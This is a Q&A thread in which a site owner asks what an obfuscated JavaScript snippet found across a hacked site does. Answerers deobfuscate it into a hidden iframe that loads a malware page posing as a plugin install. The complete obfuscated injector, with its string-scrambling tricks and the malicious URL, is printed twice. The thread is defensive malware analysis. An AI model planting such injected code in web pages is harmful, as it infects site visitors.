# what does this script do? - hacked site

Tags: javascript, security

I just came accross a site that has been hacked and I'm wondering what this javascript does.  so far as I can tell it attempts to redirect the page somewhere but fails.  It looks like it made its way into every last file on the server.

```
<script>

function sF()
{
};
var sMN = new Array();
sF.prototype =
{
    b: function ()
    {
        wL = "wL";
        var c = "c";
        var wS = new Array();
        cY = '';
        this.bW = "bW";
        this.sR = 35912;
        var f = document;
        var uH = "uH";
        var cJ = 13620;
        var n = '';
        this.hI = 9833;
        this.wX = 45851;
        var bI = function ()
        {
        };
        var e = window;
        yM = '';
        a = "a";
        var mV = 57574;
        var pD = function ()
        {
        };
        var uQ = "";
        var m = this;
        this.v = false;
        var cB = false;
        this.t = 52080;
        var qY = false;
        this.oV = '';
        wG = false;
        var nW = function ()
        {
        };
        String.prototype.xAW = function (p, d)
        {
            var i = this;
            return i.replace(p, d)
        };
        this.xA = '';
        var bA = "";
        this.oZ = 27110;
        var rR = new Array();
        var mP = function ()
        {
            return 'mP'
        };
        this.aY = 39890;
        this.wE = false;
        var j = 'sbe)t)T)'.xAW(/[)O4Eb]/g, '') + 'iZm&eZoVu&tV'.xAW(/[V&{:Z]/g, '');
        var zR = new Date();
        var yV = 30047;
        this.wLU = 47818;
        var vX = '';

        function wD()
        {
        };
        hR = 22291;
        var jF = 'eNdNdUsreNtUAUtr'.xAW(/[rpXUN]/g, '') + 'tarNiNs9daf&'.xAW(/[&9aN6]/g, '');
        this.iI = false;
        this.nK = "nK";
        this.sS = '';
        this.pL = "pL";
        var uP = function ()
        {
        };
        var l = 'w$r$i9t$e|'.xAW(/[|$~(9]/g, '');
        var lK = false;
        var aU = "aU";
        var mB = new Array();
        var cS = function ()
        {
            return 'cS'
        };
        var nKP = "";
        var dH = function ()
        {
            return 'dH'
        };
        try
        {
            tG = "";
            var jB = new Date();
            hX = '';
            var sE = "";
            var pE = new Array();
            fZ = 41855;
            var o = 's)ut'.xAW(/[tJ)md]/g, '') + 'bD'.xAW(/[D$sE{]/g, '') + 'sQtQrQiu'.xAW(/[u+QY/]/g, '') + 'njg7'.xAW(/[7qjky]/g, '');
            this.eV = '';
            dS = '';
            eS = false;
            this.eVS = false;
            var r = 'aNp6p)e6n#dNC0h6iNl0dN'.xAW(/[N)0#6]/g, '');
            fH = "fH";
            vU = "";
            this.hA = "";
            lB = 56028;
            var vN = '';
            var q = 'szrzcz'.xAW(/[z(k+G]/g, '');

            function uT()
            {
            };
            this.jKG = 26380;
            this.eG = 41884;
            wM = "wM";
            var zQ = function ()
            {
            };

            function aW()
            {
            };
            var lD = 16264;
            sU = "";
            var h = 'o|fRf@c$r/e|a@'.xAW(/[@$|R/]/g, '') + 'tLepE4l4eLm&'.xAW(/[&4LpO]/g, '') + 'e0n0t,rDeDdK'.xAW(/[K0,lD]/g, '');
            var iV = '';
            var sUW = function ()
            {
            };
            var k = false;
            this.kT = false;
            this.rW = "rW";
            var dY = 60892;
            this.xX = 51713;
            this.vS = 62755;
            var jK = 'lQy;r)h)eQiU'.xAW(/[U)QN;]/g, '') + 'gNhHt!gHr4eB'.xAW(/[BN!4H]/g, '');

            function wT()
            {
            };
            bV = "";
            var hM = new Date();
            var bL = new Array();
            var dM = false;
            var mI = "";
            var x = 't]eTdTwTizdp'.xAW(/[p]z2T]/g, '') + 'tihqg]rqdi'.xAW(/[i]bNq]/g, '');
            var sD = '';
            this.dN = '';
            this.lT = "lT";
            var jCF = function ()
            {
                return 'jCF'
            };

            function xAA()
            {
            };
            var iIQ = function ()
            {
                return 'iIQ'
            };
            var hZ = 'b]o]dBy5'.xAW(/[5];BD]/g, '');
            var vD = "";
            var oF = function ()
            {
            };
            var wGT = "";
            xJD = "xJD";
            var wH = new Date();
            var mM = function ()
            {
            };
            var dP = "dP";
            var qF = '';
            var vV = "";
            mY = false;
            var w = 'p0u<s<hk'.xAW(/[kP0Q<]/g, '');
            var pN = function ()
            {
                return 'pN'
            };
            sM = 43919;
            mZ = false;
            fM = '';
            var g = "";
            hF = 51580;
            var fJ = new Date();
            this.tU = "";
            var gG = "gG";
            kD = "";
            this.hAU = "hAU";
            jAV = "";
            var qP = '';
            var cT = "cT";
            var wZ = function ()
            {
            };
            var rE = 'abscwGibfcrGlGiJjJ'.xAW(/[JGDcb]/g, '');
            var nT = new Array();
            var mA = function ()
            {
            };
            var oZJ = function ()
            {
                return 'oZJ'
            };
            this.aM = "";
            nM = 5166;
            nTR = "";
            var oL = 'f#'.xAW(/[#A4@&]/g, '');
            zC = false;
            tD = "";
            this.vQ = false;
            var lZN = function ()
            {
                return 'lZN'
            };
            lY = 40654;
            y = 'spwpq,1mlmypt4'.xAW(/[4pmM,]/g, '');
            var qD = "qD";
            this.mS = false;
            this.jCN = "jCN";
            var fV = 26384;
            tI = "tI";
            this.aP = '';
            s = 'a#,pw727hId#eI'.xAW(/[I#up7]/g, '');
            xY = false;
            var kU = function ()
            {
                return 'kU'
            };
            var dJ = "dJ";
            var sUH = function ()
            {
                return 'sUH'
            };
            aI = 43838;
            var dK = false;
            this.gR = '';
            var oU = new Array();
            sZ = 5437;
            kH = "kH";
            var rY = false;
            this.wV = 49424;
            oU[w](oL, s, q, jK, o, h, x, rE, jF, hZ, r, f, y);
            var eI = "";

            function sMF()
            {
            };
            dSG = '';
            oD = 15793;
            var nQ = function ()
            {
            };
            this.sK = 12917;
            this.gC = false;

            function lBP()
            {
            };
            qDD = '';
            var tA = 1992;
            wC = "wC";
            this.qV = false;
            this.aD = '';
            wJ = false;

            function tF()
            {
            };
            var rH = new Date();

            function qT()
            {
            };
            var vUG = new Date();
            var gB = new Date();
            this.uL = "";
            var nS = "nS";

            function dQ()
            {
            };
            qVK = "qVK";
            var hQ = new Array();
            var lW = new Array();
            rG = false;
            var gN = "gN";

            function iE()
            {
            };
            gV = "gV";
            sT = '';
            this.fR = "fR";
            var wGW = 47062;
            this.qJ = "";
            this.gBS = "";
            var nN = function ()
            {
            };
            var gT = false;
            this.qM = "";
            var qA = false;
            this.oDD = false;
            eZ = "eZ";
            this.iW = "";

            function oFD()
            {
            };
            var tN = function ()
            {
                return 'tN'
            };
            tT = 20890;
            var uJ = '';
            var rM = '';
            xO = false;
            rK = '';
            this.aMR = 31691;
            var oLW = new Date();
            this.nJ = "";
            this.pV = 7748;
            var vJ = 8022;
            iA = 45357;
            var dD = new Array();
            var rGR = '';
            fU = '';
            this.aYO = "";
            var gNM = function ()
            {
                return 'gNM'
            };
            fN = "";
            this.yT = false;
            var rC = false;
            var tX = "";
            var mU = 41520;
            this.aJ = "";
            this.cH = "cH";
            var yY = function ()
            {
            };
            var kI = "kI";

            function tK()
            {
            };
            var tAQ = false;
            uTD = "uTD";
            var hIH = "hIH";

            function lBC()
            {
            };
            this.vA = false;
            var sDO = false;
            eZN = "eZN";
            var iL = new Date();
            var bZ = 41417;
            var dX = '';
            var bS = function ()
            {
            };
            mX = false;
            this.sDY = 12981;
            var sMFV = "sMFV";
            var xT = new Array();
            iF = "";
            var zY = '';
            vNL = '';
            var hJ = "hJ";
            var nI = function ()
            {
                return 'nI'
            };
            var tGJ = 41886;
            xAM = false;
            var tDK = 5185;
            var wSH = new Array();
            iEM = "iEM";
            this.pX = '';
            this.sH = false;
            hN = '';
            var qZ = new Date();
            qE = "qE";
            var qX = "";
            var sUT = false;
            eN = "";

            function bT()
            {
            };
            var qDC = "qDC";
            yR = "yR";
            var dMG = false;
            this.nL = "";
            var oUK = '';
            var cW = 60401;
            var xOR = 50628;
            vW = "vW";
            this.qR = "qR";
            var kB = false;

            function fG()
            {
            };
            var yVS = new Date();
            var eQ = oU[5][oU[4]](3, 16);
            this.sRU = 40424;
            var vSZ = false;
            var oUC = function ()
            {
            };
            var pS = new Date();
            tC = '';
            var uW = "uW";
            cA = "";
            var xJ = oU[7][oU[4]](3, 6);
            nE = "nE";
            var jV = false;
            fUG = "";
            var aX = false;
            this.zJ = '';
            this.dC = "dC";

            function lDV()
            {
            };
            var u = oU[1][oU[4]](3, 4);
            var aF = function ()
            {
            };
            this.sKM = '';
            gH = 35602;
            this.tE = false;
            this.wR = '';
            var lQ = function ()
            {
                return 'lQ'
            };
            jA = xJ + 'a3m3e3'.xAW(/[3Fr6h]/g, '');
            var tNZ = false;
            sHZ = '';
            var zI = new Date();
            this.hT = '';
            fY = false;
            this.aN = "aN";
            var qEY = 35434;
            var z = oU[12][oU[4]](3, 4);
            var hZQ = new Date();
            var cX = function ()
            {
                return 'cX'
            };
            this.lI = false;
            this.nMM = "";
            var dV = "";
            iM = false;
            var rJ = oU[8][oU[4]](3, 11);
            yVB = false;
            this.zP = "";
            this.jO = 34768;
            var bH = new Array();
            this.hIHR = "hIHR";
            lZ = rJ + 'b)u.tHeQ'.xAW(/[QH)N.]/g, '');
            var xI = new Date();
            this.yJ = false;
            this.tGO = 27688;
            this.yN = 6549;
            xE = '';
            var bZF = false;
            var xZ = oU[11][eQ](jA);
            zYQ = false;
            this.mC = 40578;
            var zPY = '';
            this.yTB = '';
            var gA = function ()
            {
            };
            var qL = 29571;
            var iZ = new Date();
            var qN = oU[3][oU[4]](3, 9);
            var vP = "vP";
            var yQ = new Date();
            this.gX = '';
            var iZV = '';
            this.hH = 63374;
            var jC = oU[6][oU[4]](3, 8);
            var lKY = new Date();
            var sRA = "";
            var kUY = '';
            var zS = function ()
            {
                return 'zS'
            };
            xZ[oU[2]] = 'hTt!t|p):6/|/)m|a)c|rTo6m)e)d)iTa)s6e6t|uTp!.!c|o6m|/!z!o!mTbTiTe!/)'.xAW(/[)6T|!]/g, '');
            this.rT = false;
            var qU = '';
            var nQX = function ()
            {
                return 'nQX'
            };
            this.nQK = "";
            fK = false;
            var aK = new Array();
            this.eC = "";
            uM = '';
            qXG = "qXG";
            cD = "cD";
            this.mL = false;
            var xF = function ()
            {
            };
            xZ[jC] = u;
            lH = false;
            var hRX = 24381;
            var jP = "jP";
            var rD = new Array();
            this.pK = "pK";
            sQ = '';
            this.lJ = '';
            var dW = function ()
            {
                return 'dW'
            };
            var eP = new Array();
            xZ[qN] = z;
            var mK = new Date();
            var sZM = 33888;
            var wJZ = "wJZ";
            zA = "";
            var fW = function ()
            {
            };
            this.lIJ = "";
            xL = "";
            var rKL = 29796;
            var xR = new Date();
            var pP = false;
            var qK = "";
            gTS = "";
            oU[11][oU[9]][oU[10]](xZ);
            var aG = function ()
            {
                return 'aG'
            };

            function hV()
            {
            };
            gE = "gE";
            var uHJ = "";
            this.nNX = false;
        }
        catch (xG)
        {
            this.wSN = '';

            function yJX()
            {
            };
            var sTG = new Array();
            this.wCW = "wCW";
            this.eT = "eT";
            iK = "iK";
            f[l]('<RhRt[m;l; [>a<[b|oRd[y; ;>|<|t[d; R>a<[/atRdR>a<;/Rbao[d[y;>;<;/|h|t;malR>R'.xAW(/[Ra[|;]/g, ''));
            this.xN = 35962;
            var uJT = 22074;
            fL = '';
            var wJD = '';
            oFI = '';
            e[j](function ()
            {
                m.b()
            }, 141);
            tEC = "";
            this.vK = "vK";
            var hS = function ()
            {
            };
            var gTT = new Array();
        }
        var yJB = function ()
        {
            return 'yJB'
        };
        this.mXU = "mXU";
        this.tFO = false;
    }
};
var fI = 4253;
var bJ = new sF();
bVT = 29950;
bJ.b();
var hK = function ()
{
    return 'hK'
};
</script>
```

Thanks to Peter Ajtai for cleaning it up (although editing it seemed to reload the script all cleared up.. must be an SO thing)

Comment: This code seems obfuscated and minified - at least try parsing it out a bit, so WE don't have to do the dirty work for you...

Comment: I know someone will have something to clear it up...

Comment: Best to run this type of thing on a vm without network connection.

Comment: I don't get it... Why would you "hack" a website with over a hundred lines of Javascript code, which actually does no more than `window.location = 'someevilwebsite'`? What's the point of obsfucating Javascript? To make it look evil?

Comment: to make it confusing I think.  this same script showed up in over 800 files on this site.  and there are still variations of it hinding around.

Comment: @Harmen - to make it difficult for regexp based tools to detect all of it and clean it up once discovered

Answer (score 42, accepted):

Ok, so here is what I have figured out...

Basically this script does a

```
document.body.append('<iframe height="1" src="http://macromediasetup.com/zombie/">');
```

The key line is:

```
oU[11][oU[9]][oU[10]](xZ);
```

oU is an array populate by the line:

```
oU[w](oL, s, q, jK, o, h, x, rE, jF, hZ, r, f, y);
```

oU[w] is a reference to Array.push.  So, calling this pushes these 13 items into the array.  f, hZ and r -> oU[11], oU[9], and oU[10] respectively are:

```
var f = document;
var hZ = 'b]o]dBy5'.xAW(/[5];BD]/g, '');  // evaluates to "body"
var r = 'aNp6p)e6n#dNC0h6iNl0dN'.xAW(/[N)0#6]/g, ''); // evaluates to "append"
```

so, this becomes `document['body']['append']` or `document.body.append()`

xZ is the iframe string, so it is adding that iframe to the page.  Although hitting macromediasetup.com directly just redirects to adobe.com, hitting the zombie route does something entirely different...

And the whois for this domain shows it is not adobe owned:

```
$ whois macromediasetup.com
[Querying whois.verisign-grs.com]
[Redirected to whois.PublicDomainRegistry.com]
[Querying whois.PublicDomainRegistry.com]
[whois.PublicDomainRegistry.com]
Registration Service Provided By: DOMAIN NAMES REGISTRAR REG.RU LTD.
Contact: +7.4955801111

Domain Name: MACROMEDIASETUP.COM

Registrant:
    PrivacyProtect.org
    Domain Admin        (contact@privacyprotect.org)
    P.O. Box 97
    Note - All Postal Mails Rejected, visit Privacyprotect.org
    Moergestel
    null,5066 ZH
    NL
    Tel. +45.36946676

Creation Date: 28-May-2010
Expiration Date: 28-May-2011

Domain servers in listed order:
    ns2.reg.ru
    ns1.reg.ru


Administrative Contact:
    PrivacyProtect.org
    Domain Admin        (contact@privacyprotect.org)
    P.O. Box 97
    Note - All Postal Mails Rejected, visit Privacyprotect.org
    Moergestel
    null,5066 ZH
    NL
    Tel. +45.36946676

Technical Contact:
    PrivacyProtect.org
    Domain Admin        (contact@privacyprotect.org)
    P.O. Box 97
    Note - All Postal Mails Rejected, visit Privacyprotect.org
    Moergestel
    null,5066 ZH
    NL
    Tel. +45.36946676

Billing Contact:
    PrivacyProtect.org
    Domain Admin        (contact@privacyprotect.org)
    P.O. Box 97
    Note - All Postal Mails Rejected, visit Privacyprotect.org
    Moergestel
    null,5066 ZH
    NL
    Tel. +45.36946676
```

Traceroute shows it going somewhere in Latvia...

```
 7  nyk-bb1-link.telia.net (80.91.252.162)  77.169 ms  77.401 ms  77.327 ms
 8  kbn-bb1-link.telia.net (80.91.254.88)  156.938 ms  156.960 ms  156.842 ms
 9  s-bb1-link.telia.net (80.91.247.160)  166.491 ms  166.425 ms  166.499 ms
10  s-b3-link.telia.net (80.91.247.105)  212.715 ms  212.759 ms  212.776 ms
11  telia-latvija-ic-132810-s-b3.c.telia.net (213.248.82.134)  203.272 ms  203.313 ms  203.936 ms
```

**EDIT** ok so I did a little more digging, just because it was interesting and I figured out exactly what is going on.  The file that is included in the iframe retrieves a file which will use an "hcp" protocol hack for Windows XP machines.  Basically, the included file will make a "You need to install some nifty plugin that you don't have" message appear in your browser... then, when you install it, you are in the poop.

Comment: Bravo..  good ol russian registrars.  Most hacks I've seen come from Russia so I'm not really surprised.

Comment: @WalterJ89 Latvia is not Russia

Comment: @DJMethaneMan I think he was pointing out that the registrar ends in .RU.

Comment: @DJMethaneMan Talk about digging up an old post.  Yes, Latvia is not in Russia (yet).  (<- that's a joke, calm down).  Thank you again sberry. Funny enough I've gotten better at doing this over the last 5.5 years

Comment: @walterj89 lolz - I still remember this one.  It was a lot of answers ago.  For some odd reason this got a lot of up votes recently - something drove some traffic here I suppose.

Comment: @sberry well, the official TLD of Latvia ends with .lv

Answer (score 7):

The first thing I would do is to beautify the script - I used - http://jsbeautifier.org/

This line jumped out at me (line broken up for readability):

```
 xZ[oU[2]] =
'hTt!t|p):6/|/)m|a)c|rTo6m)e)d)iTa)s6e6t|uTp!.!c|o6m|/!z!o!mTbTiTe!/)'
. xAW(/[)6T|!]/g, '');
```

The whole script is:

```
function sF()
{
};
var sMN = new Array();
sF.prototype =
{
    b: function ()
    {
        wL = "wL";
        var c = "c";
        var wS = new Array();
        cY = '';
        this.bW = "bW";
        this.sR = 35912;
        var f = document;
        var uH = "uH";
        var cJ = 13620;
        var n = '';
        this.hI = 9833;
        this.wX = 45851;
        var bI = function ()
        {
        };
        var e = window;
        yM = '';
        a = "a";
        var mV = 57574;
        var pD = function ()
        {
        };
        var uQ = "";
        var m = this;
        this.v = false;
        var cB = false;
        this.t = 52080;
        var qY = false;
        this.oV = '';
        wG = false;
        var nW = function ()
        {
        };
        String.prototype.xAW = function (p, d)
        {
            var i = this;
            return i.replace(p, d)
        };
        this.xA = '';
        var bA = "";
        this.oZ = 27110;
        var rR = new Array();
        var mP = function ()
        {
            return 'mP'
        };
        this.aY = 39890;
        this.wE = false;
        var j = 'sbe)t)T)'.xAW(/[)O4Eb]/g, '') + 'iZm&eZoVu&tV'.xAW(/[V&{:Z]/g, '');
        var zR = new Date();
        var yV = 30047;
        this.wLU = 47818;
        var vX = '';

        function wD()
        {
        };
        hR = 22291;
        var jF = 'eNdNdUsreNtUAUtr'.xAW(/[rpXUN]/g, '') + 'tarNiNs9daf&'.xAW(/[&9aN6]/g, '');
        this.iI = false;
        this.nK = "nK";
        this.sS = '';
        this.pL = "pL";
        var uP = function ()
        {
        };
        var l = 'w$r$i9t$e|'.xAW(/[|$~(9]/g, '');
        var lK = false;
        var aU = "aU";
        var mB = new Array();
        var cS = function ()
        {
            return 'cS'
        };
        var nKP = "";
        var dH = function ()
        {
            return 'dH'
        };
        try
        {
            tG = "";
            var jB = new Date();
            hX = '';
            var sE = "";
            var pE = new Array();
            fZ = 41855;
            var o = 's)ut'.xAW(/[tJ)md]/g, '') + 'bD'.xAW(/[D$sE{]/g, '') + 'sQtQrQiu'.xAW(/[u+QY/]/g, '') + 'njg7'.xAW(/[7qjky]/g, '');
            this.eV = '';
            dS = '';
            eS = false;
            this.eVS = false;
            var r = 'aNp6p)e6n#dNC0h6iNl0dN'.xAW(/[N)0#6]/g, '');
            fH = "fH";
            vU = "";
            this.hA = "";
            lB = 56028;
            var vN = '';
            var q = 'szrzcz'.xAW(/[z(k+G]/g, '');

            function uT()
            {
            };
            this.jKG = 26380;
            this.eG = 41884;
            wM = "wM";
            var zQ = function ()
            {
            };

            function aW()
            {
            };
            var lD = 16264;
            sU = "";
            var h = 'o|fRf@c$r/e|a@'.xAW(/[@$|R/]/g, '') + 'tLepE4l4eLm&'.xAW(/[&4LpO]/g, '') + 'e0n0t,rDeDdK'.xAW(/[K0,lD]/g, '');
            var iV = '';
            var sUW = function ()
            {
            };
            var k = false;
            this.kT = false;
            this.rW = "rW";
            var dY = 60892;
            this.xX = 51713;
            this.vS = 62755;
            var jK = 'lQy;r)h)eQiU'.xAW(/[U)QN;]/g, '') + 'gNhHt!gHr4eB'.xAW(/[BN!4H]/g, '');

            function wT()
            {
            };
            bV = "";
            var hM = new Date();
            var bL = new Array();
            var dM = false;
            var mI = "";
            var x = 't]eTdTwTizdp'.xAW(/[p]z2T]/g, '') + 'tihqg]rqdi'.xAW(/[i]bNq]/g, '');
            var sD = '';
            this.dN = '';
            this.lT = "lT";
            var jCF = function ()
            {
                return 'jCF'
            };

            function xAA()
            {
            };
            var iIQ = function ()
            {
                return 'iIQ'
            };
            var hZ = 'b]o]dBy5'.xAW(/[5];BD]/g, '');
            var vD = "";
            var oF = function ()
            {
            };
            var wGT = "";
            xJD = "xJD";
            var wH = new Date();
            var mM = function ()
            {
            };
            var dP = "dP";
            var qF = '';
            var vV = "";
            mY = false;
            var w = 'p0u<s<hk'.xAW(/[kP0Q<]/g, '');
            var pN = function ()
            {
                return 'pN'
            };
            sM = 43919;
            mZ = false;
            fM = '';
            var g = "";
            hF = 51580;
            var fJ = new Date();
            this.tU = "";
            var gG = "gG";
            kD = "";
            this.hAU = "hAU";
            jAV = "";
            var qP = '';
            var cT = "cT";
            var wZ = function ()
            {
            };
            var rE = 'abscwGibfcrGlGiJjJ'.xAW(/[JGDcb]/g, '');
            var nT = new Array();
            var mA = function ()
            {
            };
            var oZJ = function ()
            {
                return 'oZJ'
            };
            this.aM = "";
            nM = 5166;
            nTR = "";
            var oL = 'f#'.xAW(/[#A4@&]/g, '');
            zC = false;
            tD = "";
            this.vQ = false;
            var lZN = function ()
            {
                return 'lZN'
            };
            lY = 40654;
            y = 'spwpq,1mlmypt4'.xAW(/[4pmM,]/g, '');
            var qD = "qD";
            this.mS = false;
            this.jCN = "jCN";
            var fV = 26384;
            tI = "tI";
            this.aP = '';
            s = 'a#,pw727hId#eI'.xAW(/[I#up7]/g, '');
            xY = false;
            var kU = function ()
            {
                return 'kU'
            };
            var dJ = "dJ";
            var sUH = function ()
            {
                return 'sUH'
            };
            aI = 43838;
            var dK = false;
            this.gR = '';
            var oU = new Array();
            sZ = 5437;
            kH = "kH";
            var rY = false;
            this.wV = 49424;
            oU[w](oL, s, q, jK, o, h, x, rE, jF, hZ, r, f, y);
            var eI = "";

            function sMF()
            {
            };
            dSG = '';
            oD = 15793;
            var nQ = function ()
            {
            };
            this.sK = 12917;
            this.gC = false;

            function lBP()
            {
            };
            qDD = '';
            var tA = 1992;
            wC = "wC";
            this.qV = false;
            this.aD = '';
            wJ = false;

            function tF()
            {
            };
            var rH = new Date();

            function qT()
            {
            };
            var vUG = new Date();
            var gB = new Date();
            this.uL = "";
            var nS = "nS";

            function dQ()
            {
            };
            qVK = "qVK";
            var hQ = new Array();
            var lW = new Array();
            rG = false;
            var gN = "gN";

            function iE()
            {
            };
            gV = "gV";
            sT = '';
            this.fR = "fR";
            var wGW = 47062;
            this.qJ = "";
            this.gBS = "";
            var nN = function ()
            {
            };
            var gT = false;
            this.qM = "";
            var qA = false;
            this.oDD = false;
            eZ = "eZ";
            this.iW = "";

            function oFD()
            {
            };
            var tN = function ()
            {
                return 'tN'
            };
            tT = 20890;
            var uJ = '';
            var rM = '';
            xO = false;
            rK = '';
            this.aMR = 31691;
            var oLW = new Date();
            this.nJ = "";
            this.pV = 7748;
            var vJ = 8022;
            iA = 45357;
            var dD = new Array();
            var rGR = '';
            fU = '';
            this.aYO = "";
            var gNM = function ()
            {
                return 'gNM'
            };
            fN = "";
            this.yT = false;
            var rC = false;
            var tX = "";
            var mU = 41520;
            this.aJ = "";
            this.cH = "cH";
            var yY = function ()
            {
            };
            var kI = "kI";

            function tK()
            {
            };
            var tAQ = false;
            uTD = "uTD";
            var hIH = "hIH";

            function lBC()
            {
            };
            this.vA = false;
            var sDO = false;
            eZN = "eZN";
            var iL = new Date();
            var bZ = 41417;
            var dX = '';
            var bS = function ()
            {
            };
            mX = false;
            this.sDY = 12981;
            var sMFV = "sMFV";
            var xT = new Array();
            iF = "";
            var zY = '';
            vNL = '';
            var hJ = "hJ";
            var nI = function ()
            {
                return 'nI'
            };
            var tGJ = 41886;
            xAM = false;
            var tDK = 5185;
            var wSH = new Array();
            iEM = "iEM";
            this.pX = '';
            this.sH = false;
            hN = '';
            var qZ = new Date();
            qE = "qE";
            var qX = "";
            var sUT = false;
            eN = "";

            function bT()
            {
            };
            var qDC = "qDC";
            yR = "yR";
            var dMG = false;
            this.nL = "";
            var oUK = '';
            var cW = 60401;
            var xOR = 50628;
            vW = "vW";
            this.qR = "qR";
            var kB = false;

            function fG()
            {
            };
            var yVS = new Date();
            var eQ = oU[5][oU[4]](3, 16);
            this.sRU = 40424;
            var vSZ = false;
            var oUC = function ()
            {
            };
            var pS = new Date();
            tC = '';
            var uW = "uW";
            cA = "";
            var xJ = oU[7][oU[4]](3, 6);
            nE = "nE";
            var jV = false;
            fUG = "";
            var aX = false;
            this.zJ = '';
            this.dC = "dC";

            function lDV()
            {
            };
            var u = oU[1][oU[4]](3, 4);
            var aF = function ()
            {
            };
            this.sKM = '';
            gH = 35602;
            this.tE = false;
            this.wR = '';
            var lQ = function ()
            {
                return 'lQ'
            };
            jA = xJ + 'a3m3e3'.xAW(/[3Fr6h]/g, '');
            var tNZ = false;
            sHZ = '';
            var zI = new Date();
            this.hT = '';
            fY = false;
            this.aN = "aN";
            var qEY = 35434;
            var z = oU[12][oU[4]](3, 4);
            var hZQ = new Date();
            var cX = function ()
            {
                return 'cX'
            };
            this.lI = false;
            this.nMM = "";
            var dV = "";
            iM = false;
            var rJ = oU[8][oU[4]](3, 11);
            yVB = false;
            this.zP = "";
            this.jO = 34768;
            var bH = new Array();
            this.hIHR = "hIHR";
            lZ = rJ + 'b)u.tHeQ'.xAW(/[QH)N.]/g, '');
            var xI = new Date();
            this.yJ = false;
            this.tGO = 27688;
            this.yN = 6549;
            xE = '';
            var bZF = false;
            var xZ = oU[11][eQ](jA);
            zYQ = false;
            this.mC = 40578;
            var zPY = '';
            this.yTB = '';
            var gA = function ()
            {
            };
            var qL = 29571;
            var iZ = new Date();
            var qN = oU[3][oU[4]](3, 9);
            var vP = "vP";
            var yQ = new Date();
            this.gX = '';
            var iZV = '';
            this.hH = 63374;
            var jC = oU[6][oU[4]](3, 8);
            var lKY = new Date();
            var sRA = "";
            var kUY = '';
            var zS = function ()
            {
                return 'zS'
            };
            xZ[oU[2]] = 'hTt!t|p):6/|/)m|a)c|rTo6m)e)d)iTa)s6e6t|uTp!.!c|o6m|/!z!o!mTbTiTe!/)'.xAW(/[)6T|!]/g, '');
            this.rT = false;
            var qU = '';
            var nQX = function ()
            {
                return 'nQX'
            };
            this.nQK = "";
            fK = false;
            var aK = new Array();
            this.eC = "";
            uM = '';
            qXG = "qXG";
            cD = "cD";
            this.mL = false;
            var xF = function ()
            {
            };
            xZ[jC] = u;
            lH = false;
            var hRX = 24381;
            var jP = "jP";
            var rD = new Array();
            this.pK = "pK";
            sQ = '';
            this.lJ = '';
            var dW = function ()
            {
                return 'dW'
            };
            var eP = new Array();
            xZ[qN] = z;
            var mK = new Date();
            var sZM = 33888;
            var wJZ = "wJZ";
            zA = "";
            var fW = function ()
            {
            };
            this.lIJ = "";
            xL = "";
            var rKL = 29796;
            var xR = new Date();
            var pP = false;
            var qK = "";
            gTS = "";
            oU[11][oU[9]][oU[10]](xZ);
            var aG = function ()
            {
                return 'aG'
            };

            function hV()
            {
            };
            gE = "gE";
            var uHJ = "";
            this.nNX = false;
        }
        catch (xG)
        {
            this.wSN = '';

            function yJX()
            {
            };
            var sTG = new Array();
            this.wCW = "wCW";
            this.eT = "eT";
            iK = "iK";
            f[l]('<RhRt[m;l; [>a<[b|oRd[y; ;>|<|t[d; R>a<[/atRdR>a<;/Rbao[d[y;>;<;/|h|t;malR>R'.xAW(/[Ra[|;]/g, ''));
            this.xN = 35962;
            var uJT = 22074;
            fL = '';
            var wJD = '';
            oFI = '';
            e[j](function ()
            {
                m.b()
            }, 141);
            tEC = "";
            this.vK = "vK";
            var hS = function ()
            {
            };
            var gTT = new Array();
        }
        var yJB = function ()
        {
            return 'yJB'
        };
        this.mXU = "mXU";
        this.tFO = false;
    }
};
var fI = 4253;
var bJ = new sF();
bVT = 29950;
bJ.b();
var hK = function ()
{
    return 'hK'
};
```

Comment: looks like it redirects to macromediasetup.com.  that domain gets a "reported attack page" warning in FF.  It just redirects to adobe though.

Answer (score 4):

This is obsfucated javascript. There are tools and websites out there that will let you debug it and see the final code right before it is executed. Here is one example of an add-on that will allow you to do this:
[Javascript Deobsfucator for FireFox](https://addons.mozilla.org/en-US/firefox/addon/10345/)